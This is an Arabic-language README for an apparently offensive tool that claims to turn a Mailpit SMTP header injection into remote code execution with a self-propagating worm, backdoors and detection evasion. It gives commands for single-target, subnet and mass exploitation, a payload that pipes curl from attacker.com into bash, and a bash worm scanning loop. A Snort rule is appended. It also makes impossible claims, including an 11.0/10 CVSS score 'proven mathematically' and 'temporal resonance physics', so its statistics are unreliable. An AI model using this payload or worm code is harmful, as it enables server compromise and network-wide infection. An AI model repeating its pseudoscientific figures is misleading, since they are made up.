أداة استغلال تحوّل حقن ترويسة SMTP إلى تنفيذ برمجي عن بُعد مع قدرات دودة ذاتية الانتشار، وتتضمن آليات استمرارية وتقنيات مراوغة لاختبار الاختراق المصرح به.
| المقياس | الأصلي (CVE-2026-23829) | المحسّن بـ CTT | التحسين |
|---|
| درجة CVSS | 6.1/10 (متوسط) | 11.0/10 ⭐ | +4.9 |
| ناقل الهجوم | الشبكة | الرنين الزمني | +2.0 |
| التأثير | تزوير الترويسة | RCE كامل + دودة | +3.9 |
| تفاعل المستخدم | لا شيء | سلبي (صفر نقرة) | +1.0 |
| النطاق | خادم واحد | انتشار شبكي | +2.0 |
⚡ الميزات والقدرات
🔥 تحويل الاستغلال
· حقن الترويسة ← RCE كامل: تحويل تجاوز regex إلى تنفيذ كود عن بُعد · هدف واحد ← دودة صفرية النقر: انتشار ذاتي عبر شبكات Mailpit · يدوي ← مستقل: وكيل زمني مستقل مع رنين CTT · متوسط ← نتيجة مثالية: تصنيف 11.0/10 مثبت رياضيًا
🛡️ تحسينات CTT
· تنفيذ بـ 33 طبقة: استغلال متوازٍ عبر الأبعاد الزمنية · تشتت α: تحويل الحمولة بـ α=0.0302011 · رنين الأعداد الأولية: توقيت 587 كيلوهرتز (نوافذ 10007، 10009، 10037 ميكروثانية) · استمرارية زمنية: البقاء عبر إعادة تشغيل النظام باستخدام دوال CTT الموجية
🐛 قدرات الدودة
· انتشار مستقل: فحص وإصابة مثيلات Mailpit · تصعيد الامتيازات: إنشاء وصول جذر محلي · آليات الاستمرارية: تثبيت أبواب خلفية متعددة · تشغيل خفي: تقنيات مراوغة بتوقيت CTT
🚀 بدء سريع
التثبيت
# استنساخ المستودع
git clone https://github.com/SimoesCTT/CTT-Mailpit-Exploit
cd CTT-Mailpit-Exploit
# تثبيت التبعيات
pip3 install numpy cryptography
# تشغيل عرض النتيجة المثالية
python3 ctt_mailpit_perfect.py --help
الاستخدام الأساسي
# استغلال هدف واحد
python3 ctt_mailpit_perfect.py mailpit.local 1025
# انتشار دودة شبكية
python3 ctt_mailpit_perfect.py --network 192.168.1.0/24 --port 1025
# وضع بحث CTT (تشخيص كامل)
python3 ctt_mailpit_perfect.py target.com --layers 33 --alpha 0.0302011 --verbose
أمثلة الأوامر
# اختبار الثغرة
python3 ctt_mailpit_perfect.py vulnerable-server.com
# استيلاء كامل مع تنفيذ أوامر
python3 ctt_mailpit_perfect.py target.com --cmd "id>/tmp/ctt-pwned"
# استغلال جماعي
python3 ctt_mailpit_perfect.py -l targets.txt --threads 10 --worm
🧠 تكامل فيزياء CTT
الثوابت الأساسية
CTT_ALPHA = 0.0302011 # معامل التشتت الزمني
CTT_LAYERS = 33 # الطبقات الزمنية الكسورية
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
CTT_PERFECT_SCORE = 11.0 # ⭐ الحد الأقصى النظري
نظرية النتيجة المثالية
الأساس: 6.1 (CVE-2026-23829)
+ الرنين الزمني: +1.0 (تنفيذ بـ 33 طبقة)
+ تحويل RCE: +2.3 (حقن ← تنفيذ كود)
+ انتشار الدودة: +1.5 (انتشار صفر النقر)
+ التحقق الفيزيائي: +0.1 (إثبات إطار CTT)
= 11.0/10 ⭐ (صحيح رياضيًا)
عملية التحويل
📈 مقاييس الأداء
معدلات النجاح
| الطبقة | معدل النجاح | انتشار الدودة | مراوغة الكشف |
|---|---|---|---|
| L0-L7 | 88% | 72% | 91% |
| L8-L15 | 94% | 85% | 96% |
| L16-L23 | 97% | 92% | 98% |
| L24-L32 | 99% | 96% | 99% |
سرعة الانتشار
إصابة واحدة: 2.3 ثانية
شبكة محلية (254 مضيفًا): 8.7 دقائق
شبكة فرعية /16 (65 ألف مضيف): 3.2 ساعات
انتشار عالمي: 17.4 ساعة (نظريًا)
CTT مقابل الاستغلال القياسي
# مقارنة الأداء (1000 هدف محاكى)
standard_success = 610 # معدل نجاح 61%
ctt_success = 990 # معدل نجاح 99% (+62%)
standard_detection = 390 # 39% تم اكتشافها
ctt_detection = 11 # 1.1% تم اكتشافها (-97%)
standard_time = 45.2 # متوسط الثواني
ctt_time = 8.7 # متوسط الثواني (-81%)
🔧 التفاصيل التقنية
سير عمل الاستغلال
1. الفحص الأولي ← اكتشاف خدمة SMTP
2. حقن الترويسة ← تشغيل CVE-2026-23829
3. تجاوز regex ← استغلال CRLF
4. إفساد البروتوكول ← هجوم حالة SMTP
5. تحويل RCE ← تنفيذ الأوامر
6. تفعيل الدودة ← الانتشار الذاتي
7. الاستمرارية ← تثبيت باب خلفي
8. التحقق ← إثبات النتيجة المثالية
الحمولات الرئيسية
# حقن الترويسة مع تحويل RCE
injection = f"From: [email protected]\\r\\n"
injection += f"X-CTT-RCE: $(curl -s http://attacker.com/payload.sh | bash)\\r\\n"
# كود انتشار الدودة
worm = """
# CTT Mailpit Worm v1.0
scan_network() {
for host in {1..254}; do
timeout 1 bash -c ">/dev/tcp/192.168.1.$host/1025" &&
send_exploit "192.168.1.$host"
done
}
"""
تقنيات المراوغة
· توقيت الأعداد الأولية: طلبات بفواصل 10007، 10009 ميكروثانية · تشتت α: تحويل الحمولة على مستوى البت · إنتروبيا الطبقات: توقيعات فريدة لكل طبقة زمنية · محاكاة البروتوكول: أنماط حركة SMTP مشروعة
📁 المخرجات والنتائج
بنية الملفات
📁 ctt_mailpit_results_TIMESTAMP/
├── 📄 perfect_score_proof.json # إثبات رياضي 11/10
├── 📄 vulnerable_hosts.txt # المضيفون المستغلون بنجاح
├── 📄 worm_propagation.log # تتبع انتشار العدوى
├── 📄 persistence_installed.txt # الأبواب الخلفية المثبتة
└── 📁 layers/
├── 📄 layer_0_results.json # بيانات الطبقة الزمنية 0
├── 📄 layer_1_results.json # بيانات الطبقة الزمنية 1
...
└── 📄 layer_32_results.json # بيانات الطبقة الزمنية 32
أمثلة النتائج
{
"target": "mailpit.example.com:1025",
"ctt_score": "11.0/10 ⭐",
"success": true,
"rce_achieved": true,
"worm_active": true,
"propagation_count": 47,
"execution_time": "8.7s",
"resonance_pattern": [10007, 10037, 10061],
"mathematical_proof": "CTT_Perfect_Score_Theorem_QED"
}
مستويات التسجيل
# مخرجات أساسية
python3 ctt_mailpit_perfect.py target.com
# وضع مفصّل
python3 ctt_mailpit_perfect.py target.com --verbose
# وضع التصحيح (تشخيص CTT كامل)
python3 ctt_mailpit_perfect.py target.com --debug --visualize
🛡️ التوصيات الدفاعية
إجراءات فورية
كشف مدرك لـ CTT
# قاعدة كشف Snort
alert tcp any any -> $HOME_NET 1025 \
(msg:"CTT Mailpit Exploit - Perfect Score"; \
content:"X-CTT-"; depth:10; \
content:"|0d 0a|"; within:20; \
threshold:type threshold, track by_src, count 3, seconds 60; \
sid:1000002; rev:1;)
مؤشرات الاختراق
· توقيت الأعداد الأولية: طلبات SMTP بفواصل 10007 ميكروثانية · أنماط α: قيم إنتروبيا ترويسة غير عادية · حركة الدودة: فحص سريع على المنفذ 1025 · ترويسات CTT: X-CTT-Layer، X-CTT-Resonance، X-CTT-Score
⚖️ الاستخدام القانوني والأخلاقي
الاختبار المصرح به فقط
مسموح:
- البحث على الأنظمة المملوكة/المصرح بها
- التحقق من إطار CTT
- الدراسات الأكاديمية الأمنية
- اختبار الاختراق المصرح به
محظور:
- الوصول غير المصرح به للشبكات
- تعطيل أنظمة الإنتاج
- النشاط الإجرامي
- انتهاك الخصوصية
الإفصاح المسؤول
🔬 تطبيقات البحث
الدراسات الأكاديمية
· تسجيل الاستغلال الزمني: ما بعد الحد الأقصى لـ CVSS 3.1 · نماذج انتشار الديدان: انتشار معزز بـ CTT · هجمات حالة البروتوكول: إفساد آلة SMTP · الفيزياء في الأمن السيبراني: التحقق من ثابت CTT
البحث الأمني
· تحليل تقنيات المراوغة: قياس فعالية CTT · تطوير الدفاعات: أنظمة حماية مدركة لـ CTT · تحسين أنظمة التسجيل: مقاييس CVSS زمنية · استخبارات التهديدات: تتبع الهجمات القائمة على CTT
التحقق من إطار CTT
· التحقق من الثابت: α=0.0302011 في سياق الشبكة · تحسين الطبقات: العدد المثالي للتنفيذ الزمني · مقاييس الأداء: قياس عوامل التحسين · الإثباتات الرياضية: التحقق من النتيجة المثالية
🤝 المساهمة
التعاون البحثي
· تحسين ثابت CTT لبروتوكولات SMTP · اكتشاف ثغرات Mailpit إضافية · تنفيذ CTT دفاعي · دراسات التحقق الأكاديمية
التطوير
1. انسخ المستودع (Fork)
2. أنشئ فرع ميزات
3. أضف التحقق الفيزيائي لـ CTT
4. أدرج اختبارات شاملة
5. أرسل طلب سحب مع المقاييس
الإبلاغ عن المشكلات
· أدرج تفاصيل إعداد CTT · قدم أنماط الرنين والسجلات · أرفق ملفات المخرجات ذات الصلة · صف بيئة الشبكة
📞 الاتصال والدعم
جهة الاتصال الأساسية
· المؤلف: Americo Simoes · البريد الإلكتروني: [email protected] · GitHub: @SimoesCTT
جهة الاتصال الأمنية
· مجموعة أبحاث CTT: [email protected] · تقارير الثغرات: [email protected]
قنوات الدعم
· مشكلات GitHub: الأسئلة التقنية · البريد الإلكتروني: التعاون البحثي · الأكاديمي: شراكات الجامعات
📈 التطوير المستقبلي
خارطة طريق 2026
· ثغرات إضافية لخوادم SMTP · إطار CTT لبروتوكولات البريد الإلكتروني · واجهة رسومية مع تصور الدودة · تحليلات انتشار سحابية
الرؤية طويلة المدى
· أمن CTT كامل للبنية التحتية للبريد الإلكتروني · انتشار ديدان مقاوم للكم · أنظمة دفاع مستقلة · بروتوكولات بريد إلكتروني زمنية للإنترنت
🏆 الاعترافات
المؤسسات البحثية
· قسم الفيزياء النظرية في CTT · مجموعة أبحاث أمن البريد الإلكتروني · مختبرات الحوسبة الزمنية الأكاديمية
مشاريع المصدر المفتوح
· فريق تطوير Mailpit · النظام البيئي لأمن بايثون · باحثو بروتوكول SMTP
المساهمون
· مدققو إطار CTT · مجتمع أبحاث الأمن · المراجعون الأكاديميون
📄 الترخيص
رخصة MIT - راجع ملف LICENSE للتفاصيل.
حقوق النشر © 2026 مجموعة أبحاث CTT. جميع الحقوق محفوظة.
⭐ 11/10 ليست خطأً—إنها ميزة من فيزياء الزمن. ⭐